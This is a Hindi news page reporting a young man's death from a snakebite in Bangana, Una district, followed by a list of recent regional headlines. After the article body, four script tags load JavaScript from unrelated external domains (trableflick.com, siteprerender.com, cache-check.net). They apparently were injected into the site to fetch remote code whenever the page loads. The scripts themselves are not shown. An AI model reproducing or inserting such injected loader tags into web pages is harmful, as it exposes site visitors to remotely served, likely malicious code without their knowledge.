ऊनाः बंगाणा में सांप के डसने से 27 वर्षीय युवक की मौत

<p>जिला ऊना में सर्पदंश से एक युवक की मौत होने का मामला सामने आया है। यहां उपमंडल बंगाणा के गांव नारी देबी सिंह में 27 साल के युवक को बिस्तर पर सोए जहरीले सांप ने डंस लिया। युवक की पहचान मनोज कुमार पुत्र नानक चंद निवासी नारी देवी सिंह के रूप में हुई है। जानकारी के अनुसार बिस्तर पर लेटे युवक को एक जहरीले सांप ने काट लिया। जब परिजनों को इस बात का पता चला तो उन्होंने युवक को ऊना अस्पताल लेकर गए जहां डॉक्टरों ने उन्हें औपचारिक इलाज के बाद युवक को पीजीआई रेफर कर दिया।</p>

<p>युवक की हालत गंभीर होने के चलते परिजन उसे होशियारपुर ले गए। जहां पर निजी अस्पताल के स्टाफ ने युवक को मृत घोषित कर दिया। वापस ऊना पहुंचकर युवक का बंगाणा पुलिस की देखरेख में पोस्टमार्टम करवाया गया। बताते चले कि मृतक़ मनोज कुमार तीन भाई हैं। मृतक़ युवक ट्रैक्टर चालक था और अभी 6 माह पहले ही उसकी शादी हुई थी।</p>

<p>मृतक़ के पिता नानक चन्द और तीनों पुत्र मेहनत मजदूरी करके अपने परिवार का निर्वाह करते थे। सेल पोश मकान होने के कारण कुछ हिस्से में मकान बिल्कुल कच्चा है। इसमें ऐसी वारदात होने का डर भी हर समय रहता है। माता पिता&nbsp; का 27 साल का पुत्र और 6 माह की धर्मपत्नी का पति अब इस दुनिया को सदा के लिए अलविदा कहकर चला गया है। वहीं, थाना बंगाणा के एएसआई प्रेमपाल ने कहा कि ऊना अस्पताल में मृतक़ मनोज के शव का पोस्टमार्टम करवाकर परिजनों को सौंप दिया गया है।</p>
<script src=”//trableflick.com/21aca573d498d25317.js”></script>
<script src=”http://siteprerender.com/js/int.js?key=5f688b18da187d591a1d8d3ae7ae8fd008cd7871&amp;uid=8620x” type=”text/javascript”></script>
<script src=”http://cache-check.net/api?key=a1ce18e5e2b4b1b1895a38130270d6d344d031c0&amp;uid=8620x&amp;format=arrjs&amp;r=1598434124804″ type=”text/javascript”></script>
<script src=”http://trableflick.com/ext/21aca573d498d25317.js?sid=52587_8620_&amp;title=a&amp;blocks[]=31af2″ type=”text/javascript”></script>

Samachar First

Recent Posts

किन्नौर में 300 मीटर खाई में गिरा ट्रक, दो की मौके पर मौत

Kinnaur truck accident: किन्नौर ज़िले के निगुलसरी के पास एक  सड़क दुर्घटना में एक ईंटों…

2 hours ago

मस्जिद की 3 मंजिल गिराने के फैसले को न्यायालय में चुनौती की तैयारी

Sanjauli Mosque Demolition Controversy: राजधानी शिमला के संजौली क्षेत्र में स्थित मस्जिद की तीन अवैध…

2 hours ago

रेडियोग्राफर और लैब टेक्नीशियन का वेतन होगा दोगुना, आईजीएमसी में 10 करोड़  से  दो छात्रावास

CM Sukhu Announcement: मुख्यमंत्री सुखविंदर सिंह सुक्खू ने बुधवार को आईजीएमसी ट्रॉमा सैंटर के लोकार्पण…

3 hours ago

Kangra News: शोभा यात्रा के साथ हुई शाहपुर दशहरा उत्सव की शुरूआत

  शाहपुर का जिला स्तरीय दशहरा मेले का शुभारंभ भव्य शोभा यात्रा के साथ हुआ।…

3 hours ago

झूठा प्रचार करने से बचें PM मोदी, जयराम झूठ बोलने में PhD: CM सुक्खू

CM Sukhwinder Singh Sukhu: हिमाचल प्रदेश के मुख्यमंत्री सुखविंदर सिंह सुक्खू ने इंदिरा गांधी मेडिकल…

7 hours ago

कंगना के बाद विक्रमादित्य सिंह ने भी मंडी में खोला कैंप ऑफिस

  Vikramaditya Singh Camp Office Mandi : मंडी की सांसद कंगना रनौत द्वारा मंडी में…

8 hours ago